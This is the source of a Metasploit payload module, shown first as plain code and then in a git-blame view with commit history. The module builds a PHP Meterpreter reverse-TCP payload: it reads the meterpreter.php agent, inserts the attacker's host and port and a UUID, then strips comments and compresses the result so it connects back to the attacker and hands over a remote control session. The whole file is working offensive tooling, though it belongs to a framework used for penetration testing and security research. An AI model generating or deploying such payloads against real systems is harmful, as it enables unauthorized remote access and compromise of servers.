metasploit-framework/modules/payloads/singles/php/meterpreter_reverse_tcp.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/php/reverse_tcp'
require 'msf/base/sessions/meterpreter_php'
require 'msf/base/sessions/meterpreter_options'


module Metasploit4

  CachedSize = 26778

  include Msf::Payload::Single
  include Msf::Payload::Php::ReverseTcp
  include Msf::Sessions::MeterpreterOptions

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'PHP Meterpreter, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a Meterpreter server (PHP)',
      'Author'        => ['egypt'],
      'Platform'      => 'php',
      'Arch'          => ARCH_PHP,
      'License'       => MSF_LICENSE,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::Meterpreter_Php_Php))
  end

  def generate
    met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')

    met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
    met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']

    uuid = generate_payload_uuid
    bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
    met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")

    met.gsub!(/#.*$/, '')
    met = Rex::Text.compress(met)
    met
  end
end
make the payload name match the standard git-svn-id: file:///home/svn/framework3/trunk@9534 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-16 16:55:05 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
make the payload name match the standard git-svn-id: file:///home/svn/framework3/trunk@9534 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-16 16:55:05 +00:00			`##`

			`require 'msf/core'`
			`require 'msf/core/handler/reverse_tcp'`
Fix up php stageless payload includes 2015-05-20 06:50:00 +00:00			`require 'msf/core/payload/php/reverse_tcp'`
make the payload name match the standard git-svn-id: file:///home/svn/framework3/trunk@9534 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-16 16:55:05 +00:00			`require 'msf/base/sessions/meterpreter_php'`
			`require 'msf/base/sessions/meterpreter_options'`


PHP meterpreter refactoring in prep for uuid work 2015-05-18 07:40:48 +00:00			`module Metasploit4`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 20:31:04 +00:00
update payload sizes 2016-02-11 04:44:17 +00:00			`CachedSize = 26778`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 20:31:04 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Payload::Single`
Fix up php stageless payload includes 2015-05-20 06:50:00 +00:00			`include Msf::Payload::Php::ReverseTcp`
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Sessions::MeterpreterOptions`
make the payload name match the standard git-svn-id: file:///home/svn/framework3/trunk@9534 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-16 16:55:05 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'PHP Meterpreter, Reverse TCP Inline',`
			`'Description' => 'Connect back to attacker and spawn a Meterpreter server (PHP)',`
			`'Author' => ['egypt'],`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'License' => MSF_LICENSE,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::Meterpreter_Php_Php))`
			`end`
make the payload name match the standard git-svn-id: file:///home/svn/framework3/trunk@9534 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-16 16:55:05 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def generate`
finish move of php / python meterpreters to metasploit-payloads 2015-08-27 16:23:34 +00:00			`met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')`
PHP meterpreter refactoring in prep for uuid work 2015-05-18 07:40:48 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']`
			`met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']`
Make sure LPORT is a string when subbing * Gets rid of conversion errors like this: [-] Exploit failed: can't convert Fixnum into String * also removes comments from php meterp. Works for me with the phpmyadmin_preg_replace bug, so seems legit. 2013-04-26 20:22:15 +00:00
Use generate_payload_uuid instead of manual obj creation 2015-05-20 06:25:52 +00:00			`uuid = generate_payload_uuid`
PHP meterpreter refactoring in prep for uuid work 2015-05-18 07:40:48 +00:00			`bytes = uuid.to_raw.chars.map { \|c\| '\x%.2x' % c.ord }.join('')`
			`met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")`

Retab modules 2013-08-30 21:28:54 +00:00			`met.gsub!(/#.*$/, '')`
			`met = Rex::Text.compress(met)`
			`met`
			`end`
make the payload name match the standard git-svn-id: file:///home/svn/framework3/trunk@9534 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-16 16:55:05 +00:00			`end`